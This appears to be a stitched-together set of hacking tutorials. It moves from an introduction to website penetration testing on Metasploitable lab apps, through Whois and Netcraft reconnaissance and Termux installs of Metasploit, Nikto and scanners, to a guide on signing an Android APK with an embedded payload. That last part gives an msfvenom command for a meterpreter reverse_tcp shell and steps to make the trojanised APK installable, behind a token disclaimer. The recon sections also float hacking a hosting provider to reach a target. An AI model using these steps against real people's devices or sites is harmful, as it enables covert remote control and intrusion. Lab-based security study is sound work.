Website Penetration

What is a Website

In this section, we are going to understand what a website is. A website is nothing but just an application that is installed on a device or computer. A website has two main applications a web server(for example, Apache) and a database(for example, MySQL).

1. The web server is used to understand and executes the web application. A web application can be written in Java, Python, PHP, or any other programming language. The only restriction is that the web server needs to be able to understand and execute the web application.
2. The database contains the data that is used by the web application. All of this is stored on a computer called the server. The server is connected to the internet and has an IP address, and anybody can access or ping it.

The web application is executed either by the target or by the web server which is installed on our server. Therefore, any time we run a web application or request a page, it is actually executed on the web server and not on the client's computer. Once it is executed on the web server, the web server sends an HTML page which is ready to read to the target client or person, as shown in the following diagram:

Suppose, we are using a computer or a phone, and we want to access google.com. In our URL, if we type google.com, it will be translated to an IP address using a DNS server. A DNS is a server that translates every name, .com, .edu or any website with a name or a domain name to its relevant IP address. If we request google.com, then the request goes to a DNS server and translates google.com to the IP where Google is stored. Then the DNS server will go to the IP address of Google and execute the page that we wanted using all of the applications that we have spoken about, and then just give us a ready HTML page.

Now the program gets executed on the server, and we just get an HTML which is a markup language as a result of the program. This is very important, because in the future, if we want to get anything executed on the web server, such as a shell, then we need to send it in a language that the web server understands(for example PHP). Once we execute it inside the server, it will be executed on the target computer.

This means that, regardless of the person that accesses the pages, the web shell that we are going to send(if it is written in Java or in a language that the server understands) will be executed on the server and not on our computer. Therefore, it will give us access to the server and not to the person who accessed that server.

On the other hand, some websites use JavaScript, which is a client-side language. If we can find a website that allows us to run JavaScript code, then the code will be executed by the clients. Even though the code might be injected into the web server, it will be executed on the client side, and it will allow us to perform attacks on the client computer and not on the server. Hence, it is very important to distinguish between a client-side language and a server-side language.

Attacking a Website

In this section, we are going to discuss attacking a website. For attacking websites, we have two approaches:

1. We can use the methods of attacking a website method that we have learned so far. Because we know that a website is installed on a computer, we can try to attack and hack it just like any other computer. However, we know that a website is installed on a computer, and we can try to attack and hack it just like any other computer. We can also use server-side attacks to see which operating system, web server or other applications are installed. If we find any vulnerabilities, we can use any of them to gain access to the computer.
2. Another way to attack is client-side attacks. Because websites are managed and maintained by humans. This means that, if we manage to hack any of the administrators of the site, we will probably be able to get their username and password, and from there log in to their admin panel or to the Secure Socket Shell (SSH). Then we will be able to access any of the servers that they use to manage the website.

If both of the methods fail, we can try to test the web application, because it is just an application installed on that website. Therefore, our target might not be the web application, maybe our target is just a person using that website, but whose computer is inaccessible. Instead, we can go to the website, hack into the website, and from there go to our target person.

All of the devices and applications are interconnected, and we can use one of them to our advantage and then make our way to another computer or to another place. In this section, instead of focusing on client-side and server-side attacks, we will be learning about testing the security of the web application itself.

We are going to use the Metasploitable machine as our target machine, and if we run ifconfig command, we will see that its IP is 10.0.2.4, as shown in the following screenshot:

If we look inside the /var/www folder, we can see all the website files stored, as shown in the following screenshot:

In the above screenshot, we can see that we have a phpinfo.php page, and we have dvwa, Mutillidae, and phpMyAdmin. Now, if we go to any machine on the same network, try to open the browser and go to 10.0.2.4, we will see that we have a website made for Metasploitable, as shown in the given screenshot. A website is just an application installed on the web browser, and we can access any of the Metasploitable websites and use them to test their security:

Now we are going to look at the DVWA page. It requires a Username as admin and a Password as a password to log in. Once we enter these credentials, we can log in to it, as shown in the following screenshot:

Once we logged in, we can modify the security settings by using the DVWA Security tab, as shown in the following screenshot:

Under the DVWA Security tab, we will set Script Security to low and click on Submit:

We will keep it set to low in the upcoming section. Because this is just an introductory course, we will only be talking about the basic way of discovering web application vulnerabilities in both DVWA and the Mutilliidae web application.

If we go to the Mutillidae web application in the same way that we accessed the DVWA web application, we should make sure that our Security Level is set to 0, as shown in the following screenshot:

We can toggle Security Level by clicking the Toggle Security option on the page:

Information Gathering

In this section, we will discuss various techniques to gather information about the client using Whois Lookup, Netcraft, and Robtex. Then we will see how we can attack a server by targeting websites that are hosted on that server. Moving towards the information gathering section, we will learn about subdomains and how they can be useful for performing attacks. Later we are going to look for files on the target system to gather some information and also analyze that data.

Now, we will do information gathering before we start trying to exploit. Therefore, we are going to gather as much information as we can about the IP of the target, the technology that is used on the website, the domain name info, which programming language is used, what kind of server is installed on it, and what kind of database is being used. We will gather the company's information and its DNS records. We will also see subdomains that are not visible to other people and we can also find any files that are not listed. Now we can use any of the information-gathering tools that we used before, for example, we can use Maltego and just insert an entity as a website, and start running actions. We can also use Nmap, or even Nexpose, and test the infrastructure of the website and see what information we can gather from that.

This section will cover the following topics:

• Whois Lookup
• Netcraft

Whois Lookup

In this section, we are going to have a look at Whois Lookup. It is a protocol that is used to find the owners of internet resources, for example, a domain, a server, and an IP address. In this, we are not actually hacking, we are just retrieving information from a database about owners of stuff on the internet. For example, if we wanted to register a domain name like zaid.com we have to supply information about the person who is signing in like the address, and then the domain name will be stored in our name and people will see that Zaid owns the domain name. That is all we are going to do.

If we google Whois Lookup, we will see a lot of websites providing the services, so we are going to use http://whois.domaintools.com, enter our target domain name as isecurity.org, and press the Search button as shown in the following screenshot:

In the following screenshot, we can see that we get a lot of information about our target website:

We can see the email address that we can use to contact the domain name info. Usually, we will be able to see the company's address that has registered the domain name, but we can see that this company is using privacy on their domain. If the company is not using any privacy, we will be able to see their address and much more information about the actual company.

We can see when the domain name was created, and we can also see the IP address of isecurity.org. If we ping the IP, we should get the same IP address as mentioned in the following screenshot.

If we run ping.www.isecurity.org, the same IP address will be returned:

In the above screenshot, we can see the IP Location, Domain Status, and we can also access the History, but we need to register for that. Now, again we can use this information to find exploits.

In the following screenshot, in the Whois Record, we can find more information about the company that registered this domain:

This is essential information, but it is very helpful in the long run, just to know what their IP is, what our target is, and what services they are using. We can see the name server that is being used, and we can also see which company they are provided by.

Netcraft

In this section, we will learn how to get information about the technologies which is used by the target websites. To do this, we are going to use a website called Netcraft (https://www.netcraft.com), and then we will put the target address, select our target as isecur1ty.org, and click on the arrow as shown in the following screenshot:

After this, click on Site Report as shown in the following screenshot:

In the given screenshot, we can see some basic information like Site title, Site rank, Description, Keywords, and when the website was created:

When we further scroll down, we can see the website itself, the Domain, the IP address, and the Domain registrar, which is the company that registered the domain for isecur1ty:

In the preceding screenshot, we would normally see information about the organization, but here, we can't because isecur1ty is using privacy protection. Usually, we should be able to see such information and even more.

In the preceding screenshot, we can see that it is hosted in the UK, we can also see the Nameserver, which is ns1.digitalocean.com, and again, if we just go to ns1.digitalocean.com, we will discover that this is a website for web hosting.

Now, we know that this is a web hosting company, and in worst-case scenarios, we can use this or try to hack into ns1.digitalocean.com itself to gain access to isecur1ty.

If we further scroll down, we will see the Hosting History of the hosting companies that isecur1ty used. We can see that the latest one is running on Linux with Apache, the same server that we saw in the previous section, 2.2.31 with Unix mod_ssl and all the other add-ons:

Again, this is very important to find exploits and vulnerabilities on our target computer.

Scrolling down to Web Track ers, will show us the third-party applications used on our target, so we can see that our target uses MaxCDN, Google, and other Google services. This could also help us to find and gain access to the target computer as shown in the following screenshot:

The Technology tab shows us the technologies which are used on the target websites:

 

In the above screenshot, we can see that it is using the Apache web server. On the Server-Side, we can see that the website uses PHP, which means the website can understand and run PHP code. In future, if we manage to run any kind of code on our target, then the code should be sent as PHP code. To create payloads on Metasploit or on Veil-Evasion, we should create them in PHP format and the target website will be able to run them because it supports PHP.

On the Client-Side, we can see in the preceding screenshot that the website supports JavaScript, so if we run JavaScript on the website, it would not be executed on the website, it will be executed on the user side who are viewing the website because JavaScript is a client-side language and PHP is server-side. If we manage to run PHP code, it will be executed on the server itself. If we manage to run JavaScript, it will be executed on the users. It is the same as jQuery. This is just a framework for JavaScript.

In the following screenshot, if we are scrolling down, then the website uses WordPress Self-Hosted software. Netcraft will show any web applications being used on the website:

WordPress is just a web application, so we could see other examples in our case, and it is an open source web application, there are a lot of other websites that might have. If we are lucky enough to find an existing one, then we can go ahead and exploit it on the target website. For example, suppose we have WordPress and if we go to 

https://www.exploit-db.com/ and search for WordPress, we will be able to find a lot of exploits related to WordPress.

There are different versions of WordPress. We need to make sure that we have the same number of versions as our target. We will look at an example to see how to use exploits, but it just shows how powerful information gathering is. If we further scroll, we will find other information like the websites uses HTML5 and CSS, and all kind of stuff as shown in the following screenshot:

Hence, Netcraft is used for getting to know the website. We gathered information regarding the site that it runs on PHP and runs JavaScript. It uses WordPress, so we can use WordPress to hack into the website. If we scroll up, we also discovered the web hosting of the website. So, in the worst-case scenarios, we can try to hack into a web hosting server and gain access to our target website.

Metasploit Framework | How to install metasploit framework in termux

The Metasploit Framework is a powerful tool used by cybersecurity professionals and ethical hackers to test and exploit vulnerabilities in systems. It is a valuable resource for penetration testing and can help identify potential security weaknesses in networks, servers, and applications. If you are interested in learning more about the Metasploit Framework and how to install it, read on for a step-by-step guide.

Step 1: Install termux on your Android device

The first thing you need to do is install termux on your Android device. This is a terminal emulator and Linux environment app that allows you to run various command-line tools, including the Metasploit Framework. You can download termux from the Google Play Store or from the termux website.

Step 2: Update and upgrade termux packages

Once you have termux installed, open the app and run the following command to update and upgrade the packages:

apt update && apt upgrade

This will ensure that you have the latest packages and security updates installed on your device.

Step 3: Install the Metasploit Framework

To install the Metasploit Framework, you will need to use the termux package manager, pkg. Run the following command to install the Metasploit Framework:

pkg install unstable-repo pkg install metasploit

This will install the unstable repository, which is required to install the Metasploit Framework, as well as the Metasploit Framework itself.

Step 4: Start the Metasploit Framework

To start the Metasploit Framework, run the following command:

msfconsole

This will open the Metasploit Framework console, where you can begin using the various tools and commands available.

Step 5: Explore the Metasploit Framework

Now that you have the Metasploit Framework installed and running, you can start exploring all of the various tools and commands available. Some useful commands to try include:

• show options: Display all of the options and settings for a particular module
• show exploits: Display a list of available exploits
• show payloads: Display a list of available payloads
• use exploit/<exploit name>: Select a particular exploit to use
• set RHOST <target IP>: Set the target IP address for the exploit
• set LHOST <local IP>: Set the local IP address for the exploit
• exploit: Run the exploit

These are just a few examples of the many commands available in the Metasploit Framework

Programing enviroment in Termux

 Make a programming environment

We can install some programming languages like Python, C, Ruby, etc on Termux. 

Python

Python is the most used scripting language in hacking and penetration testing. We use it to automate stuff and build tools. Also, Python is highly used in mashing learning.

apt-get install python

C

C language is the core language of many other programming languages. You can learn computer architecture deeply if you get a good knowledge of C.

apt-get install clang

Ruby

If you want to install Metasploit on termux you need Ruby. Because MSF is coded in Ruby.

apt-get install ruby

Assembly

If you are planning to learn  hacking, Assembly is a must to learn. I suggest you write codes in C, Then disassemble them and learn Assembly.

apt-get install binutils

Turn your phone into a web server

You may know that using Python you can build a simple HTTP server. If you don't know about that read our python simple HTTP server tutorial.

You may use the following command to server on port 4444.

python -m SimpleHTTPServer 4444

Actually we install the apache server on your termux environment. Not only apache, PHP, and python also can be installed. So you can run a fully functional web server on your phone.

Some useful tools to install

Linux man pages

These are the Linux manual pages for programmers. There are hundreds of documents explaining various API s and tools. For example, if we want to know about the read() function in C you can just type "man read". It will open a page explaining how to work with read function.

You may install the manual pages with the following command.

apt-get install man

Nano editor

This is a simple text editor that can be used in the terminal. We use this tool often in Linux programming and text editing stuff. In the following image, you can see a screenshot of the nano editor.

 IP-Tracer

What is IP-Tracer ?

IP-Tracer is used to track an ip address. IP-Tracer is developed for Termux and Linux based systems. you can easily retrieve ip address information using IP-Tracer. IP-Tracer use ip-api to track ip address.

How to install IP-Tracer ?

$ apt update

$ apt install git -y

$ git clone https://github.com/rajkumardusad/IP-Tracer.git

$ cd IP-Tracer

$ chmod +x install

$ sh install or ./install

How to use IP-Tracer

trace -m to track your own ip address.

trace -t target-ip to track other's ip address for example ip-tracer -t 127.0.0.1

trace for more information.

OR

ip-tracer -m to track your own ip address.

ip-tracer -t target-ip to track other's ip address for example ip-tracer -t 127.0.0.1

ip-tracer for more information.

CYBER-SCAN

CyberScan is an open source penetration testing tool that can analyse packets , decoding , scanning ports, pinging and geolocation of an IP including (latitude, longitude , region , country ...)

Installation :

$ apt update && apt upgrade

$ apt install git 

$ apt install python2

$ apt install python

$ git clone https://github.com/medbenali/CyberScan.git

$ cd CyberScan

usage :

$ python2 CyberScan.py -v

$ CyberScan -h

We can perform ping operations with several protocols using CyberScan

The fastest way to discover hosts on a local Ethernet network

is to use ARP:

$ python2 CyberScan -s 192.168.1.0/24 -p arp

In case when ICMP echo requests are blocked, we can still use TCP:

$ CyberScan -s 192.168.1.105 -p tcp -d 80

192.168.1.105 = target IP.

Nikto web server scanner | Termux

Nikto web server scanner

Nikto is a web server assessment tool. 

The Nikto web server scanner is a security tool that will test a web site for thousands of possible security issues. Including dangerous files, mis-configured services, vulnerable scripts and other issues. It is open source and structured with plugins that extend the capabilities. These plugins are frequently updated with new security checks.

It is designed to find various default and insecure files, 

apconfigurations and programs on any type of web server 

Installation in Termux:

$ apt update && apt upgrade

$ apt install git 

$ apt install perl

$ git clone https://github.com/sullo/nikto

$ cd nikto

$ chmod +x *

usage :

perl nikto.pl -H

it shows all options how you can use this tool ...

 HOW TO Sign the APK File with Embedded Payload 

Hi MoboTherapy families welcome back

Today, I`m gonna show you: "How To Sign the APK File with Embedded Payload". I made this cause many of you asked me to solve  this error (This was built an older version of android and may not work properly.) The following Methods work 100%. So, Follow the steps carefully.

If you asked me why we have to sign the Apk file and here is why 

In Modern Android Phones, Unsigned APK files can be Easily installed. But Older versions of Android does not Support the installation of Unsigned APK files. This is not a common Problem. But for Publishers and Hackers, it can create a lot of problem, because Unsigned APK files give error on Older Android Versions & cannot be EVEN Uploaded on Google Play or Play Store.

To Manually & Properly Sign the APK, you have to Follow the Following steps Carefully!

Let's begin...

• Requirements

1). Kali Linux (Latest Version is Preferred)
2). ava v8 or above (Latest Version is Preferred)

3). ZipAlign Tool (Download it HERE , Install instructions included)

• Installation

1). Latest version of JAVA is already installed in Kali Linux. So you don`t need to download it Manually.

2). Zip-Align Tool can be found HERE. Installation instructions are Discussed there. If you have any Problems, you can install by type these commands

1. Update the package index:

    # sudo apt-get update

      

      2. Install zipalign deb package    

    # sudo apt-get install zipalign 

OR

1. Update the package index:

   # sudo apt-get update

2. Install google-android-build-tools-installer deb package:

   # sudo apt-get install google-android-build-tools-installer

3). Here I am gonna Generate a Key named key.jks for Kali.apk , which is already generated by msfvenom command

• Signing the APK File Manually

1). First, generate an Un-Signed APK File with Embedded Payload:

msfvenom -p android/meterpreter/reverse_tcp LHOST=(your-IP) LPORT=(desired-port) R > Kali.apk

2.) Now we are gonna Generate a key key.jks with KeyTool. For this, type in Terminal (screenshot Below):

 

  keytool -genkey -v -keystore key.jks -keyalg RSA -keysize 2048 -validity 10000 -alias my-alias

3). Enter a Rememberable KeyStore Password. (i.e. 123456)

4). Now, it will ask about your Personnel Information. Just Randomly fill the Form (i.e. like I do it above in the screenshot), and finally Type: yes , This will Successfully Generate a key.

5). BINGO...!!!!!!!! APK file has been signed. Now the most important step; Zip Aligning is Left, Just type the following command in terminal, and GET the Signed Kali.apk:

zipalign -v 4 Kali.apk Kali-Signed.apk

                                            DONE 

 You have Successfully Generated SIGNED APK 

                                             FILE

Location

Your Manually SIGNED Apk File, with Embedded Payload can be found here :

/root/payloadapk-Signed.apk

Note: This all about, there are many methods in the internet  this is not the only one you can check them if this method isn't satisfied you. I hope you can solve your problem and enjoy thank you.

DISCLAIMER : This Thread is only for Education Purposes. I will not be Responsible of Any Illegal use of this information. Try not to HACK the Androids, other than your`s.